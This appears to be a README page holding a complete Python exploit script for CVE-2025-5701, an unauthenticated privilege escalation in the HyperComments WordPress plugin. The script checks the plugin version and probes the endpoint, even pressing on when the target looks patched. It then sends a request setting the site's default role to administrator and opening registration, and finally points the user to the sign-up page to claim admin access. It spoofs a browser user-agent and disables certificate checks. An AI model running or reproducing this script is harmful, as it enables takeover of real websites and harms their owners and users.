README.md
Rendering markdown...
import requests
import argparse
import time
import sys
from urllib.parse import urlparse
# Exploit By : Khaled ALenazi (Nxploited )
requests.packages.urllib3.disable_warnings()
def banner():
print("\nCVE-2025-5701 - Unauthenticated Privilege Escalation Exploit")
print("By: Khaled Alenazi (Nxploited)\n")
def check_version(base_url):
readme_url = base_url.rstrip('/') + '/wp-content/plugins/hypercomments/readme.txt'
try:
response = requests.get(readme_url, timeout=10, verify=False, headers={"User-Agent": user_agent})
if response.status_code == 200:
if 'Stable tag:' in response.text:
for line in response.text.splitlines():
if 'Stable tag:' in line:
version = line.split('Stable tag:')[1].strip()
if version <= "1.2.2":
print(f"[+] Target is vulnerable (version: {version}) - proceeding with exploitation.")
return True
else:
print(f"[-] Target is not vulnerable (version: {version}) - attempting exploitation anyway.")
return False
print("[!] Version string not found in readme.txt - attempting exploitation anyway.")
return False
else:
print("[!] readme.txt not found - proceeding cautiously.")
return False
except Exception as e:
print(f"[!] Error checking readme.txt: {e}")
return False
def verify_path(base_url):
test_url = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
try:
response = requests.options(test_url, timeout=10, verify=False, headers={"User-Agent": user_agent})
if response.status_code in [200, 405]:
print("[+] Exploit endpoint is accessible.")
return True
else:
print("[-] Exploit endpoint not found.")
return False
except Exception as e:
print(f"[!] Failed to verify exploit path: {e}")
return False
def Exploit_Nxploited(base_url):
endpoint = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
data = {
"data": '{"default_role":"administrator","users_can_register":"1"}'
}
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": user_agent
}
try:
time.sleep(3) # Silent wait
response = requests.post(endpoint, data=data, headers=headers, verify=False, timeout=10)
if response.status_code == 200 and "success" in response.text:
print(f"[+] Server response: {response.text.strip()}")
print(f"[+] Registration is now enabled. New users will be assigned administrator role.")
print(f"[+] Register here: {base_url.rstrip('/')}/wp-login.php?action=register")
else:
print(f"[-] Exploit failed. HTTP {response.status_code} - {response.text}")
except Exception as e:
print(f"[!] Exploit request failed: {e}")
print("\nExploit by: Khaled Alenazi (Nxploited)")
def validate_url(url):
parsed = urlparse(url)
if not parsed.scheme:
test_https = "https://" + url
try:
requests.get(test_https, timeout=5, verify=False)
return test_https
except requests.exceptions.RequestException:
return "http://" + url
return url
if __name__ == "__main__":
banner()
parser = argparse.ArgumentParser(
description="CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)"
)
parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://site.com)")
args = parser.parse_args()
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
base_url = validate_url(args.url)
check_version(base_url)
if verify_path(base_url):
Exploit_Nxploited(base_url)